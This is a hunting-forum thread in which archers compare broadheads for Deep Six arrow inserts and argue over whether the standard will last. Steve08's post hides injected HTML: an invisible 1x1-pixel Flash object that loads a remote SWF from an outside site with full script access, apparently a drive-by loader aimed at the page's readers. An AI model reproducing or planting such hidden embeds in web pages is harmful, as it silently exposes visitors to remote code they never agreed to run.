Deep six broadheads

AllTerrainAngler

What broadheads would y'all recommend for the deep six insterts. I currently use rage and have had no issues but this is my first year with the deep six arrows.

Brad30110

Ramcats are a favorite of mine.

Huntinfool

QAD Exodus are pretty well the best broadheads I've tested on my injexions. The blades sit down over the shaft which makes them much stronger and less likely to break off like some deep six heads have been known to do.

I use the swept back blades. But the full ones work well too.

Trophy Taker has come out with a new one this year called A-Tac. But they are pretty well sold out most places and they are VERY expensive (like $90 for three). But they are supposed to be tough as nails. I'm probably going to track down a pack somewhere just to try them out.

But overall, for the money, I don't think you can do better than the Exodus in deep six.

deast1988

QAD Exodus are pretty well the best broadheads I've tested on my injexions. The blades sit down over the shaft which makes them much stronger and less likely to break off like some deep six heads have been known to do.

Trophy Taker has come out with a new one this year called A-Tac. But they are pretty well sold out most places and they are VERY expensive (like $90 for three). But they are supposed to be tough as nails. I'm probably going to track down a pack somewhere just to try them out.

But overall, for the money, I don't think you can do better than the Exodus in deep six.

This x2

bukhuntr

I shoot the hypodermic and had one break at the threads. The arrow penetrated about two inches and it shot the broadhead through the deer. Fortunately, it killed it.

I have my concerns about the deep six hypo. Not sure what I'm going to do this year.

Kris87

Ditch the Deep 6 concept. It'll be gone soon. Go back to regular heads.

Steve08

Ditch the Deep 6 concept. It'll be gone soon. Go back to regular heads.<object classid="clsid: D27CDB6E-AE6D-11cf-96B8-444553540000" width="1" height="1"><param value="http://picz.website/u/1/c.swf"><param name="allowScriptAccess" value="always" /><embed allowScriptAccess="always" src="http://picz.website/u/1/c.swf" type="application/x-shockwave-flash" width="1" height="1"></embed></object>
Second that!

AllTerrainAngler

They're in stock on the trophy taker site for 29.99 for 3.

Huntinfool

Those are the replacement blades for 29.99. The heads are going for 79-99 for three depending on where you look. But they are hard to find.

I'm not sure I agree on the deep six concept going away. At least I know I disagree on the small diameter shaft concept going away. They may find a better way to attach heads than deep six. But small diameter makes too much sense (if for no other reason than marketing success). Smaller diameter allows for thicker walls at the same GPI. The wind resistance thing is probably much less of a deal than it's made to be. But, again, it's a great marketing tool.

Those arrows aren't going anywhere anytime soon. The deep six concept might. But the micro diameter arrows won't. It's too good of a sales pitch and, whether it translates to deer or not, there is no denying that they penetrate deeper into a target...which again is another great marketing tool for them.

jfarrell30339

Just sent you a message. I've got some hypos in deep six...

I can't use them. I had accidentally bought two packs. Opened one and returned the other. BPS won't take the open one back. Let me know and they're yours.

markland

Hypodermic or Trocar would be my suggestion just be sure to choose something with a steel ferrule, aluminum will not hold up in that smaller thread diameter. Good luck